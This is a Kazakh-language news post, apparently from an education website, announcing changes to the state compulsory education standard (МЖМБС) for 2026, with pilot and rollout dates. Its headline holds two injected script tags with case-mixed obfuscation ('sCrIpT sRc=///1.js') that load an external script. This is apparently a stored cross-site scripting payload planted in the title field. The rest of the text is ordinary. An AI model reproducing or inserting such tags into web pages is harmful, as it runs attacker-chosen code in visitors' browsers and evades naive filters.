МЖМБС - 2026 басты өзгерістері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.03.2025

Бастауыш және орта білім беру сапасын арттыру, негізгі ережелерді өзектендіру мақсатында мемлекеттік жалпыға міндетті білім стандарты (МЖМБС) әзірленді. МЖМБС жобасы екі жыл бойы педагогикалық, сараптамалық қоғамдастықтардың, ата-аналар қауымдастығының, үкіметтік емес ұйымдардың өкілдерімен және депутаттармен талқылана отырып жасалды. 

📖МЖМБС жобасында оқытудағы құндылыққа бағдарланған тәсілге және білім берудегі инклюзивті тәсілді арттыруға баса мән берілген. Жаңа МЖМБС жобасында пәндер мен сағаттар саны сақталатынын атап өткен жөн. 

❕Білім беру стандарттарын өзектендіру – білім беру саласындағы заманауи үрдістерді ескеруге мүмкіндік беретін жалпы қабылданған әлемдік тәжірибе. Естеріңізге сала кетейік, қазіргі қолданыстағы МЖМБС 2016 жылдан кезең-кезеңімен енгізілген болатын. Жаңа МЖМБС апробациясы 2025-2026 оқу жылында басталып, толық іске асыру 2026-2027 жылға жоспарланды.

Просмотров: 871


Пікір қосу



Деректерді қолтаңбаға қосу